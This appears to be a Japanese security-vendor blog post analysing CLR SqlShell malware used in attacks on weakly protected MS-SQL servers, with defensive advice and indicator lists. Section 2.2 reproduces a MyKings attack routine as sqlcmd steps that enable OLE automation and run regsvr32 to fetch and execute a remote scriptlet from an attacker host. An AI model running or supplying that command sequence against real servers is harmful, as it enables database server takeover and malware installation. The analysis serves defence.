このブログでは、MS-SQL サーバーを対象とする攻撃に使用される CLR SqlShell マルウェアを解析する。SqlShell は Web サーバーにインストールされる WebShell と同じく、MS-SQL サーバーにインストールされ、攻撃者のコマンドの実行や様々な悪意のある振る舞いの実行をサポートするマルウェアである。MS-SQL サーバーでは、拡張機能が使用できるように CLR Stored Procedure という方式をサポートしているが、SqlShell はこのような方式で製作された DLL である。CLR Stored Procedure は xp_cmdshell コマンドとともに、攻撃者が MS-SQL サーバーで悪意のあるコマンドを実行できる代表的な方式の一つである。
もちろん、CLR Stored Procedure に渡されたコマンドを実行する機能が含まれているとしても、正常な目的で使用されるように製作された可能性もある。しかし、MS-SQL サーバーを対象とする攻撃の大半でこれが使用されており、攻撃者は主に SqlShell を、コインマイナーやランサムウェアなどの最終的なマルウェアをインストールする手段として使用している。このブログでは、様々な種類の SqlShell がそれぞれサポートする機能、および実際に攻撃に使用された事例をともに解析して公開する。
1. 概要
外部インターネットに公開されていながらも、単純な形態の暗号を使用している MS-SQL サーバーは、Windows システムを対象とする代表的な攻撃ベクトルの一つである。攻撃者は不適切に管理されている MS-SQL サーバーを探してスキャニングした後、総当たり攻撃や辞書攻撃を通じて管理者権限でログインできるようになる。ここまでのプロセスが終わると、攻撃者は様々な方式でマルウェアをインストールし、感染システムの制御権を獲得する。
攻撃者が MS-SQL サーバーに管理者アカウントでログインした後、実質的にマルウェアをインストールするために使用できる方式としては xp_cmdshell コマンドが代表的であり、このコマンドを通じて Windows 環境でも動作する悪意のあるコマンドを実行することができる。それ以外にも、OLE Stored Procedure にコマンドを登録したり、MS-SQL Agent Jobs というタスクに悪意のあるコマンドを登録する方式も、Windows コマンドを実行する方式の一つである。もちろん、このようにコマンドを実行する方式の代わりに、特定の機能が搭載された実行ファイルを製作して登録することで、特定の機能を実行させる方式も存在する。MS-SQL サーバーではこのような拡張機能のために Extended Stored Procedure または CLR Stored Procedure 形態の DLL をサポートしており、開発者は希望する機能が含まれた DLL を製作して登録することで特定の機能を提供することができる。
AhnLab Security Emergency response Center(ASEC)では、四半期ごとの ASEC Report を通じて、不適切に管理されている MS-SQL サーバーを対象とする攻撃に使用されるマルウェアの統計を提供している。[1] 統計を見ると、CLR Shell、すなわち SqlShell に分類されるマルウェアの数量が多く確認されるが、これは CLR Stored Procedure 形態の DLL マルウェアである。このマルウェアは単独で使用されるよりも、攻撃者がランサムウェアやコインマイナーのようなマルウェアをインストールする過程で一緒に使用されるケースが大半を占めている。
ここでは MS-SQL サーバーから提供される機能のうち、Windows OS コマンドを実行できる機能を取り扱い、実際のマルウェアを種類別に分類して整理する。SqlShell の中には単純に渡されたコマンドを実行する形態のものもあるが、ファイルのダウンロード/アップロードや権限昇格機能を提供する形態のものもある。もちろん、このように攻撃者のコマンドを受け取る代わりに、特定のアドレスからマルウェアをダウンロードしてインストールするダウンローダー形態のものもある。
2. MS-SQL 対象攻撃方式
一般的に攻撃者やマルウェアは MS-SQL サービスがインストールされた環境、すなわち1433番ポートがオープンされたサーバーをスキャニングして探す。スキャニングプロセス以降は、総当たり攻撃や辞書攻撃で確認された MS-SQL サーバーへのログインを試みる。ここで Windows OS コマンド実行を可能にする大半の機能は sa (SQL Admin)、すなわち管理者アカウントを必要とする。
攻撃者が直接スキャニングおよび辞書攻撃を実行する代わりに、マルウェア自身が不適切に管理されている MS-SQL サーバーを対象として伝播するケースもある。代表的なものには LemonDuck コインマイナーマルウェアがあり、以下は LemonDuck が辞書攻撃に使用する sa アカウントのパスワードリストである。
LemonDuck は内部伝播、すなわちラテラルムーブメントのプロセスにおいて MS-SQL サーバーを対象に辞書攻撃を使用するが、Kingminer [2]や Vollgar [3]コインマイナーは外部に開放されている MS-SQL サーバーを対象に総当たり攻撃を実行する。
攻撃者またはマルウェアは、sa アカウントや sa アカウントの権限を獲得した後に、悪意のあるコマンドを実行したり、実質的なマルウェアをインストールして感染システムの制御権を獲得しようとする。sa アカウントの権限を持っているとしても、それは MS-SQL データベースサーバーの制御権を獲得するだけであり、Windows OS 自体の制御権を獲得したわけではないためである。すなわち、SQL コマンドを実行することはできるが、Windows OS に影響を及ぼす振る舞いは基本的に提供されない。
しかし、MS-SQL は Windows OS で OS コマンドを実行できるようにする様々な機能をサポートしており、これを悪用すると最終的には OS コマンドを実行することができる。ここでは MS-SQL データベースサーバーを通じて OS コマンドを実行できる方式を取り扱う。このような機能は基本的に SQL 関連コマンドではないため、セキュリティに脆弱な項目であり、当然ではあるが、大半は基本的に無効化されている。しかし、管理者アカウントはこの設定を有効にすることができるため、管理者アカウントでログインするということは、このような機能が使用できるということを意味する。すなわち sa アカウントを獲得すると、結局は Windows OS の制御権も獲得できるのである。
2.1. xp_cmdshell
xp_cmdshell コマンドは引数で渡されたコマンドを Windows シェルで実行させる機能を提供する。xp_cmdshell コマンドで実行された Windows コマンドは、sqlservr.exe プロセスによって「cmd.exe /c」コマンドで実行される。
実際のマルウェアの中では LemonDuck が xp_cmdshell を利用して追加マルウェアをダウンロードする。LemonDuck には、xp_cmdshell が無効化ではなく登録解除されている場合に備えて、これを再登録するプロセスも追加されている。
2.2. OLE Stored Procedure
OLE ストアドプロシージャを利用する方式は、OLE の機能を悪用して他のアプリケーション、すなわち悪意のあるコマンドやマルウェアを実行させる方式である。これもまた xp_cmdshell コマンドのように無効化されているため、有効化タスクが必要である。
以下は MyKings コインマイナーマルウェアが実際の攻撃に使用するルーティンを再現したものである。
CMD > sqlcmd -S [IP アドレス] -U sa -P testsql
1> sp_configure ‘show advanced options’, 1;
2> RECONFIGURE;
3> go
1> sp_configure ‘Ole Automation Procedures’,1;
2> RECONFIGURE;
3> go
1> DECLARE @shell INT
2> EXEC SP_OAcreate ‘{72C24DD5-D70A-438B-8A42-98424B88AFB8}’,@shell OUTPUT
3> EXEC SP_OAMETHOD @shell,’run’,null, ‘regsvr32 /u /s /i:hxxp://js.f4321y[.]com:280/v.sct scrobj.dll’;
4> go
2.3. MS-SQL Agent Jobs
MS-SQL Agent Jobs という機能を利用すると、上記で取り扱った形態のように Windows コマンドを実行するタスクを登録できる。SQL Server Agent は単純に OS コマンドを実行する CmdExec 方式と、JS または VBS スクリプトを使用できる ActiveScripting 方式をサポートしている。
2.4. Extended Stored Procedure
MS-SQL サーバーは拡張機能を提供するために Extended Stored Procedure という方式をサポートしている。攻撃者は不正な DLL を製作して sp_addextendedproc コマンドで登録した後、その DLL のエクスポート関数を実行し、不正な DLL のロードおよび不正な振る舞いを担うエクスポート関数を実行させることができる。
2.5. CLR Stored Procedure
CLR Stored Procedure は上記で取り扱った拡張ストアドプロシージャと類似しているが、.NET DLL である点が違うと言える。CLR Stored Procedure を登録して使用するには、xp_cmdshell のように有効化タスクが必要である。
上記で取り扱ったように LemonDuck は xp_cmdshell を利用することもあるが、CLR Stored Procedure も一緒に使用する。
3. CLR SqlShell 解析
3.1. 基本的なタイプ
ここではコマンド実行やファイルダウンロードのような基本的な機能だけを提供する SqlShell を取り扱う。SqlShell は攻撃プロセスにおいて、他のマルウェアをインストールする中間段階としてよく使用されるため、このように単純な形態も攻撃プロセスでよく確認される。
3.1.1. コマンド実行 (LEMONDUCK)
LemonDuck は StoredProcedures クラスの ExecCommand() メソッドを登録して使用する。ExecCommand() メソッドは内部的に RunCommand() メソッドを呼び出す。名前は evilclr.dll であり、機能的にはコマンド実行ルーティンのみ存在する。LemonDuck は、このように登録された CLR アセンブリの ExecCommand() 関数を、追加ペイロードのダウンロードに使用する。
3.1.2. ダウンロードコマンドサポート (SHAW20211224)
以下は「shaw20211224.dll」という名前の SqlShell であり、渡されたコマンドを実行する RunCommand() 関数以外にも外部からファイルをダウンロードする DownloadRun() 関数と、渡されたパスのファイルを窃取する PutDatas() 関数が提供される。
3.1.3. シェルコード実行 (Metasploit)
ペネトレーションテストツールの一つである Metasploit もこのような MS-SQL サーバーを対象とする攻撃をサポートしている。Metasploit は上記で取り扱った辞書攻撃から権限昇格、そして様々な OS コマンド実行手法を提供しており、当然 CLR SqlShell 手法も提供している。
Metasploit は攻撃プロセスで以下のような SqlShell をインストールするが、渡されたシェルコードをメモリ上で実行する機能を担っている。Metasploit では単純な形態のリバースシェルやバインドシェル、様々な機能を提供するバックドアマルウェアの Meterpreter を追加でサポートしており、攻撃者が指定したマルウェアをインストールするシェルコードが実行される。
以下は当社 AhnLab Smart Defense(ASD) のログである。攻撃者が不適切に管理されている MS-SQL サーバーに侵入して Metasploit の「SqlClrPayload.dll」をインストールした後、Metasploit の Meterpreter バックドアを sqlservr.exe プロセスのメモリ上で実行させたことが確認できる。
3.2. 拡張された機能を提供するタイプ
上記では相対的に単純な形態の SqlShell を取り扱ったが、攻撃者はさらに様々な機能を提供する SqlShell を使用することもある。様々な機能が提供されるほど、攻撃者はマルウェアインストールのように、次に実行する不正な振る舞いをより簡単に進めることができるためである。
3.2.1. SQLHELPER (TRIGONA ランサムウェア)
代表的には SqlHelper という名前の SqlShell も攻撃によく使用される。類似する形態が多数存在することから、ソースコードが公開されているものと推定されており、相対的に単純な形態である以下のマルウェアも、コマンド実行機能以外にユーザーアカウントの追加やトンネリング、ファイルタスクのような機能を提供していることが確認できる。
過去の Trigona ランサムウェア [4] 攻撃事例で確認された SqlShell も SqlHelper である。Trigona 攻撃者が使用した SqlHelper には、権限昇格のための MS16-032 脆弱性を利用した攻撃ルーティンが一緒に存在する。攻撃者はこれを利用して、MS-SQL サービスを昇格した権限で実行させ、この権限で Trigona ランサムウェアをサービスに登録する。
3.2.2. CLRSQL (SHADOWFORCE 攻撃グループ)
CLRSQL という名前の SqlShell も SqlHelper と類似している。ファイル / ディレクトリ / プロセス / アカウント関連のタスクなど、サポートしている関数を見ると、一般的な WebShell マルウェアとかなり類似していることが特徴である。
CLRSQL SqlShell の中には、上記で取り扱ったタイプに比べてさらに多い機能、例えば PingCastle が一緒に実装された形態も存在する。PingCastle は Active Directory 環境で攻撃に必要な情報を収集するために使用されるツールである。
PingCastle が一緒に実装された CLRSQL SqlShell は、ShadowForce の攻撃プロセスでも使用される。ShadowForce 攻撃グループは2013年から確認されている攻撃グループであり、主に韓国の企業と機関を攻撃してきたことが分かっている。特徴としては、主に MS-SQL サーバーを攻撃対象にするという点がある。[5] [6]
ShadowForce によって攻撃されたシステムで、不適切に管理されている MS-SQL サーバーを対象に攻撃する他のマルウェアが一緒に確認できることから、ShadowForce も不適切なアカウント情報を使用するシステムを主な攻撃対象にしていると思われる。
以下の ASD ログを見ると、まず「Tmp1C4E.tmp」、すなわち SqlShell がインストールされた後、順に ShadowForce の別のマルウェアが生成されることが確認できる。すなわち ShadowForce は不適切に管理されている MS-SQL に侵入した後、追加マルウェアをインストールするために CLR Stored Procedure マルウェアを使用しており、大半の攻撃プロセスで同じフローが確認できる。
3.2.3. CLR_MODULE (SHADOWFORCE 攻撃グループ)
CLR_module という名前の SqlShell も CLRSQL と同じく、様々な機能とともに PingCastle をサポートするという共通点がある。異なる点を挙げると、CLR_module は CLRSQL が提供する機能以外にも追加で BadPotato、EfsPotato など、権限昇格ツールを一緒に提供するという点がある。このような追加機能のせいか、ShadowForce の攻撃プロセスでも CLRSQL と一緒に確認される事例が多々ある。
3.3. コインマイナーインストール
上記では WebShell のように攻撃者のコマンドを受けて、特定のコマンドを実行する形態を取り扱った。ここでは SqlShell 自体に特定機能が実装された形態を取り扱う。このような形態は大半がコインマイナーをインストールするタイプであり、そのため、攻撃に使用された SqlShell は大半がダウンローダーまたは Dropper 機能を担っている。
3.3.1. MRBMINER
MrbMiner は過去に MS-SQL サーバーを対象に配布された代表的なコインマイナーの一つである。[7] 2020年から確認されており、最終的には XMRig コインマイナーをインストールする。MrbMiner のインストールプロセスで使用される SqlShell には、それ自体に解析妨害手法が存在しているが、上記で取り扱ったタイプとは異なり、MrbMiner をインストールするダウンロード機能のみを提供する。
バージョンによって異なるが、以下のようにハードコーディングされた C&C アドレスを直接確認することができる。
3.3.2. MYKINGS
MyKings コインマイナーは様々な方式を利用して配布されており、MS-SQL を対象とする攻撃でも様々な方式が使用されている。一つ目は上記で取り扱った OLE ストアドプロシージャ方式であり、それ以外にも以下のように CLR アセンブリを利用する方式の ExecCode.dll ファイルが存在する。
SqlStoredProcedure1() メソッドは特定のアドレスからテキストファイルをダウンロードするが、これには追加ペイロードをダウンロードするアドレスが書かれている。その後、そのアドレスをパッシングして実際の MyKings ペイロードをインストールする。ExecCode.dll は上記のように簡単な形態であるが、MyKings が使用する CLR アセンブリの中にはさらに複雑な形態もあると確認された。
MSSqlInterface.dll は ExecCode.dll と同じく StoredProcedures クラスおよび SqlStoredProcedure() メソッドで実行され、追加の機能が提供される。まずは初期ルーティンで、0xFA として1バイトの XOR を使ってエンコードされている C&C アドレスを復号化する。その後、窃取した基本的な情報をメインループで C&C サーバーに定期的に伝達し、ファイルおよびシェルコードをダウンロードして実行する。
3.3.3. LOVEMINER
LoveMiner は、脆弱な MS-SQL サーバーを対象に配布されるコインマイナーマルウェアであり、exe 実行ファイル形態のダウンローダー以外にも CLR ストアドプロシージャ形態のダウンローダーも確認できる。[8]
LoveMiner ダウンローダーは特定のアドレスにアクセスし、Base64 でエンコードされたコインマイナーを「C:\windows\temp\0c0134c0cbebf48be8c95920f5ea74fc.txt」パスにダウンロードして保存する。このファイルがすでに存在している場合には、これを読み込んだ後に Base64 デコードし、メモリ上にロードする。
最終的にはコインマイナー DLL をロードした後、エクスポート関数のうち、ExecSql() を引数とともに呼び出す。この DLL はカスタマイズされた XMRig であり、一つ目の引数で伝達された文字列が「getmoney#2021」で正しいかチェックした後、三つ目の引数で伝達されたマイニングプールアドレスおよび ID などをパッシングしてモネロコインに対するマイニングを実行する。
LoveMiner をインストールする SqlShell の中には、ダウンローダー以外に Dropper 形態も存在する。実際に XMRig コインマイナーは内部リソース「gmp」に保存されており、SqlShell はこれをメモリ上でロードする役割を担っている。gmp もまたカスタマイズされた XMRig であり、初期ルーティンでマイニングプールアドレスのようにマイニングに必要な情報を設定する。
3.4. Proxyware のインストール
Proxyware とは、インストールされたシステムから、現在使用できるインターネット帯域幅の一部を外部に共有するプログラムである。一般的にこのプログラムをインストールしているユーザーは帯域幅を提供する代わりに一定の金額を受け取っている。ユーザーの立場からすると、システムに Proxyware をインストールすることで一定の収益を得ることができるが、外部のユーザーが自分のネットワークを利用して特定の振る舞いを行うという点において、危険性を承知していなければならない。すなわち、ユーザーは Proxyware 事業で主張しているものが具体的にどこにあるのか確認できず、当該事業で自主的に検証を行っていると言っても、その後の自分のインターネット帯域幅が不正に使用されてるのかを確認できないといった危険性が存在している。
ASEC ではユーザーの同意なしに Proxyware をインストールするマルウェアを確認し、ブログで公開したことがある。[9] このようなマルウェアに感染したシステムは、強制的にネットワーク帯域幅を窃取されることになり、攻撃者はこれによって収益を得ることになる。 このように、感染システムのリソースを利用して収益を得る方式は、コインマイナーと類似しているとも言える。
ASD ログで確認できるように、攻撃者は MS-SQL サーバーに「sdk.mdf」という名前を持つ Proxyware をインストールすると同時に、これを実行する SqlShell 使用して帯域幅を窃取した。「sdk.mdf」は実質的な機能を担当する DLL ファイルであり、このファイル自体は Proxyware メーカーで提供する機能のみを持っている。
しかし、一緒に生成された SqlShell の「Tmp417C.tmp」は、Proxyware の「sdk.mdf」をロードし、エクスポート関数の p2p_start() を呼び出すことでユーザーに認知されることなく動作させる。p2p_start() の呼び出しには、利益を受け取るメールアドレスを引数で伝達しなければならないため、以下のように攻撃者のメールアドレスを確認できる。
ここで SqlShell の名前が「SqlServerWorks.CLR.P2P.dll」になっているが、これは LoveMiner の SqlShell に類似しており、実際に ASD ログでも LoveMiner と Proxyware が一緒にインストールされる傾向であることから、これらは同じ攻撃者であると推定される。
4. 結論
最近、不適切に管理されている MS-SQL データベースサーバーを対象とする SqlShell マルウェアがインストールされている。SqlShell はバックドアやコインマイナー、Proxyware のような追加マルウェアをインストールしたり、WebShell のように攻撃者のコマンドを受けて悪意のあるコマンドを実行する時に使用される。
MS-SQL データベースサーバーを対象とする攻撃の代表例としては、不適切にアカウント情報を管理しているシステムに対する総当たり攻撃(Brute Forcing)と辞書攻撃(Dictionary Attack)がある。攻撃対象となる MS-SQL サーバーは、データベースサーバーとして直接構築するケースもあるが、ERP および業務用ソリューションをインストールする過程で一緒にインストールされるケースも多々ある。
そのため、管理者はアカウントのパスワードを推測が困難な形式で設定し、定期的にパスワードを変更することで、総当たり攻撃や辞書攻撃からデータベースサーバーを保護しなければならず、セキュリティパッチを最新にして脆弱性攻撃を防止しなければならない。また、外部に開放されていてアクセスが可能なデータベースサーバーに関してはファイアウォールのようなセキュリティ製品を利用し、攻撃者からのアクセスを統制しなければならない。
ファイル検知
– CoinMiner/Win.Generic.R503247 (2022.07.08.00)
– CoinMiner/Win.Generic.R531037 (2022.10.20.02)
– CoinMiner/Win.Generic.R548410 (2023.01.04.01)
– Downloader/Win.MyKings.C2097492 (2022.03.28.03)
– Downloader/Win.MyKings.C4262789 (2022.03.28.03)
– Malware/Win.Generic.C4624149 (2021.09.06.02)
– Trojan/Win.Generic.C4819385 (2021.12.08.01)
– Trojan/Win.Generic.C4977493 (2022.02.22.00)
– Trojan/Win.LEMONDUCK.C4206511 (2022.02.17.01)
– Trojan/Win.SqlShell.C4975954 (2022.02.18.01)
– Trojan/Win.SqlShell.C4975955 (2022.02.18.01)
– Trojan/Win.SqlShell.C4975957 (2022.02.18.01)
– Trojan/Win.SqlShell.C4975960 (2022.02.18.01)
– Trojan/Win.SqlShell.C4975962 (2022.02.18.01)
– Trojan/Win.SqlShell.C5109399 (2022.05.02.01)
– Trojan/Win.SqlShell.C5271966 (2022.10.04.02)
– Trojan/Win.SqlShell.C5310256 (2022.11.21.03)
– Trojan/Win.SqlShell.C5310259 (2022.11.21.03)
– Trojan/Win.SqlShell.R473182 (2022.02.18.01)
– Trojan/Win.SqlShell.R473183 (2022.02.18.01)
– Trojan/Win.SqlShell.R489848 (2022.05.02.01)
– Trojan/Win.SqlShell.R535294 (2022.11.21.03)
– Trojan/Win.SqlShell.R546675 (2022.12.28.03)
– Trojan/Win.SqlShell.R549834 (2023.01.09.03)
– Trojan/Win.SqlShell.R567705 (2023.04.04.01)
– Trojan/Win.SqlShell.R576151 (2023.05.02.02)
IOC
MD5
– 383d20de8f94d12a6ded1e03f53c1e16 : LemonDuck (evilclr.dll)
– 3e81a45507aea0945c57b67f193138a2 : Simple SqlShell (test.dll)
– e16bd473c6dcfdc62053864c8a52060d : Simple SqlShell (dll.dll)
– 694d4270555f8b5e41a49990c8c62789 : Simple SqlShell (shaw20211224.dll)
– 17606de13187c780ad3bf6caf2d1bd8c : Simple SqlShell (shaw20211224.dll)
– f0b837709ddde332bd2d7c8db9ccc1a2 : Simple SqlShell (shaw20211224.dll)
– ba1772486fd114b3a384d012645ac905 : Metasploit SqlShell (SqlClrPayload.dll)
– 46b639d59fea86c21e5c4b05b3e29617 : SqlHelper – Trigona (sqlhelper.dll)
– b1c9a484d0fce8740438547694dbaadf : SqlHelper (sqlhelper.dll)
– ddec0377794f1e3d7c0cb4c93b1cb3c1 : SqlHelper (sqlhelper.dll)
– 25dbf4f43b91bec3bfabac16b310bc08 : SqlHelper (sqlhelper.dll)
– b3f1b115efe4d58145be73ba8e2033ea : SqlHelper (sqlhelper.dll)
– e4518c9f624775ebdbc4c26d70df4356 : SqlHelper (sqlhelper.dll)
– 15c87480e0405b41f675222ef2bea95a : SqlHelper (sqlhelper.dll)
– 47cb400ee9d6cc9b951296b29488956b : SqlHelper (sqlhelper.dll)
– 7a7eb2d08f427644c37f771a2d174376 : CLRSQL Type 1 (CLRSQL.dll)
– 7ae173b79f3adfa3dec15c49a51ea235 : CLRSQL Type 1 (CLRSQL.dll)
– b37278c39d5eff637823b01f6dbb7c6d : CLRSQL Type 1 (SQLCLR.dll)
– 760cfbdd6abb9c0362feef3d6cad3d9b : CLRSQL Type 2 – ShadowForce (CLRSQL.dll)
– c3ce5aa5257d7a0d24c281a77b08c4d1 : CLRSQL Type 2 – ShadowForce (CLRSQL.dll)
– 329f6d74299141fe06a5e222efcb06f8 : CLR_module– ShadowForce (CLR_module.dll)
– cfbadc45f2ca5ecd4c663d37afd784a2 : CLR_module (CLR_module.dll)
– 5d0ed9dc8864776021cf59099ca5af91 : MrbMiner (Microsoft.SqlServer.Management.dll)
– b2ecc580203ec41fa007021db3f2aceb : MrbMiner (Microsoft.SqlServer.Management.dll)
– 6f3c3e5b69de7d192088ffb98a345e4d : MyKings (Operate.dll)
– 896ad50bcf14cf7fd26538bfa5a95899 : MyKings (Operate.dll)
– 130d2b07a1c4cde8f0804df9fa9622d4 : MyKings (MSSqlInterface.dll)
– 61fabf8842e7a93236b16f42cfc16d19 : MyKings (MSSqlInterface.dll)
– 2f1aecbdb7ffcb0016de8ab734c0de44 : MyKings (ExecCode.dll)
– 63609079a3e4af8643d33b05894e9670 : LoveMiner – Dropper (Microsoft.SqlServer.Works.dll)
– 380702ee8884e4676d837a866b6be4c2 : LoveMiner – Dropper (Microsoft.SqlServer.Works.dll)
– b87734108c8065bd8c6bc5f4096debed : LoveMiner – Dropper (Microsoft.SqlServer.Works.dll)
– 3badb7bc10be12ddb710302e56445db9 : LoveMiner – Dropper (Microsoft.SqlServer.Works.dll)
– 74b1a7e895df180d5d1fe60d4fc5fa69 : LoveMiner – Dropper (Microsoft.SqlServer.Works.dll)
– cc677b21dfda8718ab0431813bc7f0d2 : LoveMiner – Dropper (Microsoft.SqlServer.WorksV7.dll)
– 012e607f99ecc5b108b292d72938456a : LoveMiner – Downloader (Microsoft.SqlServer.Works.dll)
– 6ff71e8b324886e05deac82debc882af : LoveMiner – Downloader (Microsoft.SqlServer.Works.dll)
– 1e92e397d0ad3d8006d99f81d913ffa1 : LoveMiner – Downloader (Microsoft.SqlServer.Works.dll)
– 281735b72906841ad705017ddf529440 : LoveMiner – Downloader (Microsoft.SqlServer.Works.dll)
– 7ff7fbd615ea5da6d5d07d6af6a0442c : LoveMiner – Downloader (SqlServerWorks.CLR.V2.dll)
– afd5b836bc4f6d276ba8cdf66afb7e93 : LoveMiner – Downloader (Microsoft.SqlServer.Works.dll)
– 281735b72906841ad705017ddf529440 : LoveMiner – Downloader (Microsoft.SqlServer.Works.dll)
– be12cf29d01de28944af89de391f2d9a : Proxyware (SqlServerWorks.CLR.P2P.dll)
ダウンロードアドレス
– hxxp://js.f4321y[.]com:280/v.sct : MyKings
– hxxp://load2.wpd0126[.]info/pld : MyKings
– hxxp://load.wpd0126[.]info/pld : MyKings
– hxxp://load.wpd0126[.]info/pld : MyKings
– hxxp://c.getmoney[.]company/config.txt : LoveMiner
– hxxp://c.getmoney[.]company/ver.txt : LoveMiner
– hxxp://c.getmoney[.]company/data.txt : LoveMiner
– hxxp://c.getmoney[.]company/CLRV7/ver.txt : LoveMiner
– hxxp://c.getmoney[.]company/CLRV7/data.txt : LoveMiner
– hxxp://dl.love-network[.]cc/SqlBase.exe : LoveMiner
C&C アドレス
– 88.214.26[.]9:13785 : Metasploit Meterpreter
– vihansoft[.]ir:3341 : MrbMiner
– adminserver[.]online:1001 : MrbMiner
– pcadmin[.]online:1001 : MrbMiner
– 54.36.10[.]73:1001 : MrbMiner
関連 IOC および詳細な解析情報は、AhnLab の次世代脅威インテリジェンスプラットフォーム「AhnLab TIP」サブスクリプションサービスを通して確認できる。
Categories:マルウェアの情報